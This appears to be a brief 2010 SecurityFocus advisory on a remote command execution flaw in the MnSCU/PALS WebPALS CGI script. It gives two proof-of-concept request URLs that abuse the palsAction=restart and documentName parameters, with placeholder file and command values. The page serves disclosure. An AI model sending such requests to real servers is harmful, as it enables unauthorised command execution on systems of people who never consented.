MnSCU/PALS WebPALS Remote Command Execution Vulnerability

The following example has been provided by <cuctema@ok.ru>:

http://target/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file

http://target/pals-cgi?palsAction=restart&documentName=url_to_command


 

Privacy Statement
Copyright 2010, SecurityFocus